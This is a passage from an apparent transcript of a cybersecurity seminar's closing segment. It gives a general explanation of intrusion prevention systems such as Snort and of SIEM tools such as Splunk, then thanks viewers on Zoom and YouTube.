and essentially what it does, it has a collection of different rules and identifiers of previously known attacks. And what it's going to do is it's going to inspect all of the traffic that's coming through, and it's going to try and match that based on those rules. And so what you can do that is you can actually drop things automatically based on those sets. So that would be something that could be very useful. Again, it entirely relies on those rules that you set. And so if maybe there's a 0-day attack that you've never seen before, that could be something that would slip through and you wouldn't be able to catch it through there. But if you have time, certainly go ahead and set one up. It's a little bit less likely in competition settings, but it's something that you could do as well as just a general system. For security information and event monitoring systems, those are more, so think of them as like something like Splunk. And so they're basically just aggregating data and allowing you to see it in one good, easy place to view it. The thing with those is a lot of the stuff that you can do manually, but when you start to have a larger organization, it becomes infeasible. So like, let's say you have 1,000 machines. Yes, you could be monitoring and looking for different events. On Windows, you have the Windows Event Manager, and so you have a whole bunch of different IDs that you're monitoring and taking a look at there. But when you have a very large infrastructure, it becomes very infeasible to monitor all of that at the same time. So that's what a SIEM is very good for, is aggregating all that information together, keeping it in one place so that you can view it all. They'll give you event logs, event warnings, and they'll allow you to sort things very quickly. So I don't have anything for you today on those. Those take a little bit more. They're a little bit more intensive. Sometimes the Snort installation could take 2 hours, 3 hours. So I decided not to do it as part of the seminar or boot camp that we have here. But at the very least, hopefully you got a good idea of kind of what we're doing. A lot of it is very similar to those event log, those log looking through, looking for active connections. It just does it on a bigger scale, and it has a lot more resources in terms of what it's investigating. So that was the main thing that I would know there. But that's all that we have. I wanted to say thank you before we wrap up here. Thank you for everybody, especially for everybody who dropped by on Zoom. I really appreciate it. It's really wonderful. It helps me a lot when I see other people that are in the chat room. So if we do things like this again, I do highly recommend it if you're on YouTube to try and check it out live as we're doing things. That really helps me a lot when I'm putting this stuff together. But if you are on YouTube, I wanted to say thank you so much for watching this series and making it to the end here. We really, really appreciate it. The more views we get, it really helps us get an indication of kind of how much of an impact that we're having, and it gives us an idea of different things that we're going to go ahead and continue and keep having into the future. So that certainly helps. But thank you so much, everybody. I really appreciate it, and good luck. If you're using this as sort of like an introduction to the field, hopefully you found this exciting and that you're ready to learn more and kind of get more involved in cybersecurity. And if you're using this for a competition setting, good luck and best of luck. Hopefully you found these tips and tricks and different kind of tools and things very useful for those sort of scenarios as well. So I really appreciate it. And good luck, everybody. And that's where we're pretty much going to call it.